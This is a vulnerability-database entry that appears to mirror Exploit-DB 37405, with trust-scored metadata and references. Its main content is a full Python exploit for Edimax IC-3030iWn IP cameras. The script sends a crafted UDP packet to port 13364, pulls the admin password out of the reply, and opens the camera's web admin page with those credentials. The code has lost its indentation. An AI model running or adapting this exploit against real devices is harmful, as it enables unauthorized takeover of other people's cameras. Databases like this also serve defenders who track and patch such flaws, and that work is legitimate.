ID

VAR-E-201206-0548


EDB ID

37405


TITLE

Edimax IC-3030iWn - UDP Packet Password Information Disclosure - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37405

DESCRIPTION

Edimax IC-3030iWn - UDP Packet Password Information Disclosure.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 37405

AFFECTED PRODUCTS

vendor:edimaxmodel:ic-3030iwnscope: - version: -

Trust: 1.0

sources: EXPLOIT-DB: 37405

EXPLOIT

source: https://www.securityfocus.com/bid/54006/info

Edimax IC-3030iWn is prone to an information-disclosure vulnerability.

Successful exploits will allow a remote attacker to gain access to sensitive information. Information obtained will aid in further attacks.

#!/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: y3dips@echo.or.id, @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
- Edimax IC-3015
- Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""

import socket
import webbrowser
import sys

if len(sys.argv) != 2:
print "Eg: ./edimaxpwned.py edimax-IP"
sys.exit(1)

port=13364
target= sys.argv[1]

def read_pw(target, port):
devmac = "\xff\xff\xff\xff\xff\xff"
code="\x00\x06\xff\xf9" #for unicast reply
data=devmac+code
sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.connect((target,port))
try:
sock.send(data)
sock.settimeout(5)
tmp = sock.recv(4096)
return tmp
except socket.timeout:
return None

def pwned_edi():
data=read_pw(target, port)
if data != None:
data=data[365:377]
pw=data.strip("\x00")
webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
else:
print "Socket timeOut or not Vulnerable"

pwned_edi()

Trust: 1.0

sources: EXPLOIT-DB: 37405

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 37405

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37405

TYPE

UDP Packet Password Information Disclosure

Trust: 1.0

sources: EXPLOIT-DB: 37405

CREDITS

y3dips

Trust: 0.6

sources: EXPLOIT-DB: 37405

EXTERNAL IDS

db:EXPLOIT-DBid:37405

Trust: 1.9

db:BIDid:54006

Trust: 1.9

db:EDBNETid:58628

Trust: 0.6

sources: BID: 54006 // EXPLOIT-DB: 37405 // EDBNET: 58628

REFERENCES

url:https://www.securityfocus.com/bid/54006/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/37405/

Trust: 0.6

url:https://www.exploit-db.com/exploits/37405

Trust: 0.3

sources: BID: 54006 // EXPLOIT-DB: 37405 // EDBNET: 58628

SOURCES

db:BIDid:54006
db:EXPLOIT-DBid:37405
db:EDBNETid:58628

LAST UPDATE DATE

2022-07-27T09:54:33.314000+00:00


SOURCES UPDATE DATE

db:BIDid:54006date:2012-06-14T00:00:00

SOURCES RELEASE DATE

db:BIDid:54006date:2012-06-14T00:00:00
db:EXPLOIT-DBid:37405date:2012-06-14T00:00:00
db:EDBNETid:58628date:2012-06-14T00:00:00